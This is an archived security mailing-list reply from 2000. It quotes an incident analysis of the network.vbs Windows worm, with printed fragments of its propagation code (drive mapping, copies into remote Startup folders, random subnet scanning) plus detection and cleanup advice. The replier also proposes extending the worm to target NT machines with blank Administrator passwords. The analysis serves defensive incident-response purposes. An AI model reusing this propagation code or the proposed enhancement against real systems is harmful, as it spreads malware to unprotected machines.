Re: Lame Windows Worm

[sozni () USA NET (.sozni)]

I'd say this script isn't so lame if it managed to install itself onto your
friend's startup group.  In fact, the brilliant thing about this little script
is that it demonstrates that one doesn't have to know much about networks or
even programming to create their own internet worm.  It is funny to me that
you so harshly criticize the script and yet you say that a precondition is
that one must have their entire C drive shared without a password!

And the worst thing about this whole scenario is that this "lame" little
script will probably very easily replicate itself across the millions of
shared and unpassworded C drives out there.  What I would do to this script is
add in a bit of code that also looks for NT systems with blank Administrator
passwords, probably doubling the ground the worm covers.

.sozni

----- Original Message ----- 
From: "Chris Brenton" <cbrenton () sover net>
To: <INCIDENTS () SECURITYFOCUS COM>
Sent: Saturday, February 26, 2000 9:23 PM
Subject: Lame Windows Worm

> Greetings all,
>
> I had a friend running WinProxy on a Windows 98 machine run across a
> file named network.vbs in their startup group. I ran it past the
> Dartmouth collage security institute and this is what they came up with.
> The attack is somewhat lame but has the potential to waste quite a bit
> of bandwidth. Since it was found in the wild, its obviously making the
> rounds.
>
> The script appears to be a direct rip off of the
> c:\windows\samples\wsh\network.vbs script included with Windows 98.
> Guess the purp could not even be bothered to write their own code. ;)
>
> Effected Systems: Windows 95 and Windows 98
>
> Method of infection: File copy via file shares
>
> Special conditions required: Drive "C" must be shared read/write with no
> password
>
> How to tell if you are infected: Look for network.vbs in the startup
> group
>
> How to clean it: Remove network.vbs from the startup group ;)
>
> Code analysis: Interesting bits pasted below with added commentary
>
> ------
> do
> do while driveconnected = "0"
> checkaddress()
> shareformat()
> wshnetwork.mapnetworkdrive "j:", sharename
> enumdrives()
> loop
> copyfiles()
> disconnectdrive()
> loop
>
> The main purpose of the script can be seen here. Its designed to create
> share mappings with other Windows systems and then copy over files.
>
> ------
> function checkfile()
> If (fso1.fileexists("c:\network.log")) then
> fso1.deletefile("c:\network.log")
> createlogfile()
>
> The script creates a log file. This gives a good clue as to infection.
> If you have this file on your system, you may be infected.
>
> ------
> fso.copyfile "c:\network.vbs", "j:\"
> fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
> fso.copyfile "c:\network.vbs", "j:\windows\"
> fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
> fso.copyfile "c:\network.vbs", "j:\win95\start menu\programs\startup\"
> fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
> fso.copyfile "c:\network.vbs", "j:\wind95\"
>
> Geesh, how many copies of the file do you need to infect the target
> system? Lines 2 and 6 would be sufficient. Speaks of an amateur that
> didn't really know what they where doing so they just kept adding copy
> jobs till it worked consistently. ;)
>
> A couple of points worth noting:
> The entire "C" drive must be shared to get infected
> This script is targeted at Windows 95 & 98 systems
> You can see if you are infected by looking for network.vbs in startup
> group
>
> ------
> function checkaddress()
> octd = octd + 1
> if octd = "255" then randaddress()
> end function
>
> function shareformat()
> sharename = "\\" & octa & dot & octb & dot & octc & dot & octd & "\C"
> end function
>
> Here's where things start to get nasty. The system figures out who to
> infect next by enumerating the local address and walking the subnet.
> This should trigger any IDS system tuned in to hosts performing a
> service scan for NetBIOS/IP.
>
> ------
> function randum()
> rand = int((254 * rnd) + 1)
> end function
>
> function randaddress()
> if count < 50 then
> octa=Int((16) * Rnd + 199)
> count=count + 1
> else
>
> Guess its not enough to infect the local subnet, this script then goes
> out and probes random hosts in the 199.x.x.x to 215.x.x.x subnet ranges.
> This is done 50 times before moving on to the section of the script
> below.
>
> ------
> randum()
> octa= rand
> end if
> randum()
> octb=rand
> randum()
> octc=rand
> octd="1"
> myfile.writeLine("Subnet  :  " & octa & dot & octb & dot & octc & dot &
> "0")
> end function
>
> Start checking random subnets and log them to the c:\network.log file.
> One interesting point here is the script specifically targets x.x.x.1
> addresses. Again speaks to an amateur as a .1 address will typically be
> occupied by a router, not a Windows machine.
>
> So this script is nothing severe but could be a nasty waste of bandwidth
> in the wrong environment. This script could be real pain on a cable or
> DSL environment. It could also be trouble in a corporate environment on
> a Monday morning when everyone powers back up for the first time.
>
> HTH,
> Chris

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1